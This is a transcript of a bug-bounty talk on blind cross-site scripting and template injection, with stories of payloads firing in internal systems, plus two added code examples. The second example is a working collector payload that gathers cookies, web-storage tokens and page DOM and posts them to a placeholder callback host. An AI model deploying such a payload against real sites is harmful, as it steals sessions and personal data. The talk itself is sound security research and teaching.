
Getting Blindly Lucky

JR0ch17
November 01, 2020


Transcript

  1. {{ agenda }}
     • What is XSS?
     • & 
     • Blind XSS Stories
     • Questions/Comments
  2. {{ XSS }}
     Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted websites.*
     • Malicious Script
     • Types of XSS
       • Reflected
       • DOM => postMessage()
       • Stored => Blind
     * https://owasp.org/www-community/attacks/xss/
  3. {{ XSS PoCs }}
     • Typical PoCs
       • Steal CSRF tokens
       • Steal cookies (if not HttpOnly)
       • Steal localStorage and sessionStorage tokens
       • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (i.e. PII)
       • SSRF if found in an HTML to PDF converter
  4. {{ }}
     MVC client-side framework built by Google
     • XSS
       • Not the typical XSS
       • Template Injection
       • {{7*7}} => returns 49
     https://jsfiddle.net/navb4jh3/
  5. {{ }}
     "Progressive" MVVM client-side framework for building UIs and SPAs
     • XSS
       • Not the typical XSS
       • Template Injection
       • {{7*7}} => returns 49
     https://jsfiddle.net/s6b3dy25/
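The template-injection point on the two framework slides above, shown as an added example that is not part of the deck: the frameworks are assumed to be AngularJS and Vue.js (my assumption from the descriptions "built by Google" and "progressive MVVM"), and the render functions, the stored sample values and the probe regex below are mine, not code from either project. The point it demonstrates is why `{{7*7}}` survives the escaping that stops a classic `<script>` payload, and what actually neutralises it.

```javascript
// Added example (not from the talk): HTML entity escaping does not stop
// client-side template injection, because the HTML parser decodes entities
// before the framework reads the text node. The fix is to mark the
// user-controlled node as non-bindable. Framework names are an assumption.

// Standard HTML entity escaping, as a server applies it before echoing user data.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: the escaped value lands inside a region the framework
// compiles, so `{{7*7}}` reaches the expression evaluator untouched and renders as 49.
function renderProfileAngular(displayName) {
  return `<div ng-app><p>Welcome, ${escapeHtml(displayName)}</p></div>`;
}
function renderProfileVue(displayName) {
  return `<div id="app"><p>Welcome, ${escapeHtml(displayName)}</p></div>`;
}

// Hardened pattern: ng-non-bindable (AngularJS) and v-pre (Vue) are documented
// directives that tell the framework to skip compilation of that element and
// its children. Escaping still matters: it is what stops the user closing the span.
function renderProfileAngularSafe(displayName) {
  return `<div ng-app><p>Welcome, <span ng-non-bindable>${escapeHtml(displayName)}</span></p></div>`;
}
function renderProfileVueSafe(displayName) {
  return `<div id="app"><p>Welcome, <span v-pre>${escapeHtml(displayName)}</span></p></div>`;
}

// Detection side: flag stored values carrying an interpolation probe. `{{7*7}}`
// is the canonical CSTI test; any `{{ ... }}` in a field that should never
// contain template syntax deserves a look.
const INTERPOLATION = /\{\{[\s\S]*?\}\}/;
function looksLikeTemplateProbe(value) {
  return INTERPOLATION.test(value);
}

// Constructed sample of stored user values (not real data).
const storedValues = [
  'Alice',
  '<script>alert(1)</script>', // classic XSS probe: escaping neutralises it
  '{{7*7}}',                   // CSTI probe: escaping leaves it intact
  'Bob {{ 1337 }}',
];

// Run escaping over each value and report what survives it.
function triage(values) {
  return values.map((v) => ({
    value: v,
    escaped: escapeHtml(v),
    classicXssNeutralised: !escapeHtml(v).includes('<'),
    templateProbe: looksLikeTemplateProbe(escapeHtml(v)),
  }));
}
```

The `triage` output makes the asymmetry visible: the `<script>` value comes back with no `<` left, while `{{7*7}}` comes back byte-for-byte unchanged and still flagged as a probe.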
  6. {{ Blind XSS }}
     Variant of a Stored XSS. The payload is saved and executed in a separate part of the application (i.e. admin panel) or in a completely different application (internal application).
     • Tools
       • XSSHunter
       • Sleepy Puppy
       • Burp Collaborator
  7. {{ HackerOne Hacktivity Blind XSS Reports }}
     All blind XSS payloads from HackerOne's Hacktivity are from an HTML context (i.e. <script> tag). Not a single one from template injection.
  8. {{ Blind XSS Story #1 }}
     A Google search led to Apple's QuickLook feature. QuickLook is a way to preview a file to view its contents instead of having to open the file.
  9. {{ Blind XSS Story #1 }}
     When an XSS triggers with XSSHunter, it captures the DOM...
  10. {{ Blind XSS Story #1 }}
     Turns out the CSV file contained a LOT of PII...
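What a blind-XSS probe records when it fires somewhere you cannot see (the admin panel or internal application of the Blind XSS slide, or the DOM capture XSSHunter performs in Story #1), written as an added example that is not code from the deck or from XSSHunter: the collector, the token and CSRF heuristics, the callback URL and the fake window below are my own constructions. The window-like object is passed in so the same code runs in a browser as `collectContext(window)` and in Node against the constructed fake.

```javascript
// Added example (not from the talk or XSSHunter): collect the context a
// blind-XSS payload needs to report back, and assess which of the PoC targets
// from the XSS PoCs slide are actually reachable from it.

const MAX_DOM_BYTES = 64 * 1024; // cap the capture: an admin panel DOM can hold a lot of PII

// Web Storage exposes length/key(i)/getItem; copy it out as a plain object.
function readStorage(storage) {
  const out = {};
  if (!storage) return out;
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

function collectContext(win) {
  const doc = win.document;
  const dom = doc.documentElement ? doc.documentElement.outerHTML : '';
  return {
    // Where it fired: the public site, an admin panel, or an internal
    // application you never saw. This is the "blind" part of the report.
    origin: win.location.origin,
    url: win.location.href,
    referrer: doc.referrer,
    userAgent: win.navigator.userAgent,
    // Only cookies without HttpOnly are readable; an empty string usually
    // means the session cookie is HttpOnly, not that there is no session.
    cookies: doc.cookie,
    localStorage: readStorage(win.localStorage),
    sessionStorage: readStorage(win.sessionStorage),
    domTruncated: dom.length > MAX_DOM_BYTES,
    dom: dom.slice(0, MAX_DOM_BYTES),
  };
}

// Decide which PoC targets the capture actually gives you.
function assessContext(ctx) {
  const tokenLike = /token|jwt|auth|session/i; // heuristic, my own choice
  const storageKeys = Object.keys(ctx.localStorage).concat(Object.keys(ctx.sessionStorage));
  return {
    host: new URL(ctx.url).hostname,
    cookiesReadable: ctx.cookies.length > 0,
    tokenKeys: storageKeys.filter((k) => tokenLike.test(k)),
    csrfTokenInDom: /name=["']?_?csrf/i.test(ctx.dom),
  };
}

// Send the report home. sendBeacon survives page unload; a no-cors fetch is the fallback.
function report(win, callbackUrl, ctx) {
  const body = JSON.stringify(ctx);
  if (win.navigator.sendBeacon) return win.navigator.sendBeacon(callbackUrl, body);
  return win.fetch(callbackUrl, { method: 'POST', mode: 'no-cors', body });
}

// Constructed fake window (not a real capture) so the block runs outside a browser.
function fakeWindow() {
  const mem = (obj) => ({
    length: Object.keys(obj).length,
    key: (i) => Object.keys(obj)[i],
    getItem: (k) => obj[k],
  });
  return {
    location: { origin: 'https://admin.internal.example', href: 'https://admin.internal.example/tickets/42' },
    navigator: { userAgent: 'Mozilla/5.0 (constructed)', sendBeacon: () => true },
    document: {
      referrer: 'https://admin.internal.example/tickets',
      cookie: '', // session cookie is HttpOnly: nothing readable
      documentElement: { outerHTML: '<html><body><form><input name="_csrf" value="abc"></form></body></html>' },
    },
    localStorage: mem({ auth_token: 'eyJ.constructed.jwt', theme: 'dark' }),
    sessionStorage: mem({}),
  };
}

// In a real payload: report(window, 'https://your-collector.example/cb', collectContext(window));
```

The DOM cap is deliberate: Story #1 shows the capture can land on a page full of other people's data, so a probe used in a bounty programme should take only as much as proving impact needs, and the assessment step tells you whether the HttpOnly flag or a storage-held token is what decides the severity.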
  11. {{ Blind XSS Story #2 }}
     Someone had filed a complaint on my user!!! The complaint was forwarded as an email. The XSS triggered in the email system!